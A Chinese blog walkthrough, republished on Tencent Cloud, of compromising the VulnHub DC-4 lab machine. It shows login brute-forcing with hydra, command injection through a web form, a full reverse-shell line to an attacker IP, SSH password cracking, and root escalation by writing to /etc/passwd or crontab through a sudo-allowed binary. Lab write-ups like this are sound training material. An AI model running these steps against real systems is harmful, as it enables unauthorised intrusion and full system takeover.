前往小程序,Get更优阅读体验!
立即前往
首页
学习
活动
专区
工具
TVP
发布
社区首页 >专栏 >VulnHub靶机渗透之DC:4

VulnHub靶机渗透之DC:4

作者头像
光明SAMA
发布2019-07-25 15:23:15
1.4K0
发布2019-07-25 15:23:15
举报
文章被收录于专栏:吾生也有涯IT也无涯

这次的靶机为DC系列第四个靶机,这系列的靶机设计的很不错,每个靶机环境都比较相似,但是每一个靶机都需要不同的技术和技巧,闲话不多说,下载地址:https://download.vulnhub.com/dc/DC-4.zip,感兴趣自行下载。

第一步依然是nmap扫描开放的端口,只有22和80两个。80端口为nginx的web服务。

打开网页,只有一个登陆界面,剩下的啥都没找到。

在exploitdb中没有找到可以直接利用的漏洞,随便试了几个密码,发现这个页面没有验证码和错误次数的限制,看来可以尝试爆破了。利用hydra对登陆密码进行爆破,得到了admin的密码为happy。

登陆后的页面中可以查看文件列表,磁盘利用率和剩余空间,通过结果来看明显是通过linux的命令得到的回显。查看页面源码,发现表单传递的就是ls -l,du -h和df -h这几个命令,这样就好办了,直接修改源码执行其他命令就可以获取到shell了。

先用id命令试一下,在浏览器开发者模式下修改页面元素,直接提交,可以看到页面返回了uid信息,说明id命令执行成功。

接下在在本地利用nc监听5555端口,并修改页面中传递的命令为“/bin/bash -c 'bash -i >& /dev/tcp/192.168.x.x/5555 0>&1'”,通过以上命令将目标主机的shell反弹到本机的5555端口。

查看/etc/passwd,得知还有charles,jim和sam三个用户存在。

看来应该可以利用这三个用户其中的某一个通过ssh登录系统了。随后又在jim的目录下发现了一个old-password.bak的文件,从文件名来看肯定与密码有关了,全部copy到本地,作为字典暴力破解刚刚得到的三个用户。

通过上面得到了字典成功找到了jim的密码为jibril04,ssh登陆目标主机。

登陆后系统提示有一封邮件,

在var/mail下,找到了jim的邮件,内容中有charles的密码,话说这个密码还挺复杂。

利用charles登陆目标系统(直接切换用户也可以),在用户目录下没有什么发现,find查找拥有suid的文件,也没有收获。

通过sudo -l,发现这个用户可以在不需要密码的情况下执行/usr/bin/teehee这个文件。

看看这个文件的帮助,原来可以利用它来向其他文件写入内容,这样来看提权有望了。

利用teehee可以向其它文件以root身份写入内容,我们有两种方法得到root权限。

第一种:直接向/etc/passwd中增加内容

直接在/etc/passwd中增加一行,用户名为“wang”,uid和gid都为0,那么这个用户就相当说root。之后直接切换到wang这个用户,得到root权限。

第二种:通过定时任务执行脚本提权

向/etc/crontab文件中写入新的定时任务

时间部分全部填写为*,这样默认这个定时任务每分钟执行一次,可以根据情况自行设定。通过执行的脚本将/bin/sh的权限修改为4777,这样就可以在非root用户下执行它,并且执行期间拥有root权限。

通过ls -al可以看到/bin/sh的权限已经改变为“rws********”

直接执行/bin/sh,得到root权限。

在/root下找到flag

本文参与 腾讯云自媒体同步曝光计划,分享自微信公众号。
原始发表:2019-06-27,如有侵权请联系 cloudcommunity@tencent.com 删除

本文分享自 吾生也有涯IT也无涯 微信公众号,前往查看

如有侵权,请联系 cloudcommunity@tencent.com 删除。

本文参与 腾讯云自媒体同步曝光计划  ,欢迎热爱写作的你一起参与!

评论
登录后参与评论
0 条评论
热度
最新
推荐阅读
相关产品与服务
验证码
腾讯云新一代行为验证码(Captcha),基于十道安全栅栏, 为网页、App、小程序开发者打造立体、全面的人机验证。最大程度保护注册登录、活动秒杀、点赞发帖、数据保护等各大场景下业务安全的同时,提供更精细化的用户体验。
领券
问题归档专栏文章快讯文章归档关键词归档开发者手册归档开发者手册 Section 归档